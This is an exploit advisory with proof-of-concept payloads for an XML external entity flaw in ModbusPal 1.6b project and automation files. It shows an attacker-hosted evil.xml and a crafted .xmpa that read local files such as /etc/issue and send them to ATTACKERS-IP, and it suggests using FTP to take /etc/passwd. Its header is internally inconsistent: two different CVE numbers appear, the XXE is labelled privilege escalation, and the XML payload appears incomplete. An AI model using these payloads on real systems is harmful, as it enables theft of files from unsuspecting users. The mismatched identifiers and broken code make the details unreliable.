ModbusPal 1.6b CVE-2018-10832 – XML External Entity Injection

Authors:Trent Gordon            Risk:High

CVE:CVE-2018-7891              0day:Privilege Escalation  

0day -id:0DAY-176159            Date:2018-05-10


ModbusPal 1.6b is vulnerable to an XML External Entity (XXE) attack. Projects are saved as .xmpp files and automations can be exported as .xmpa files, both XML-based and vulnerable to XXE injection. Sending a crafted .xmpp or .xmpa file to a user, when opened/imported in ModbusPal 1.6b, will return the contents of any local files to a remote attacker.


a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting evil.xml)
b.) Contents of hosted "evil.xml"
<!ENTITY % data SYSTEM "file:///etc/issue">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://ATTACKERS-IP:9999/?%data;'>">
c.) Example Exploited "xxe.xmpa"
<?xml version="1.0" ?>
<!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/evil.xml">
<!DOCTYPE modbuspal_automation SYSTEM "modbuspal.dtd">
<automation name="temp" step="1.0" loop="true" init="0.0">

Additional Details

Java 1.7 contains certain defenses against XXE, including throwing a when certain characters (such as ‘/n’) are included in a URL. This means that the file exfiltrated in the above attack is limited to single line files that dont contain any restricted characters. The above POC uses /etc/issue, which is one of the few common linux files that meets this criteria. Exploitation of this vulnerability on later versions of Java requires a more creative approach than described above, such as using FTP instead of URL to exfiltrate /etc/passwd.

Leave a Reply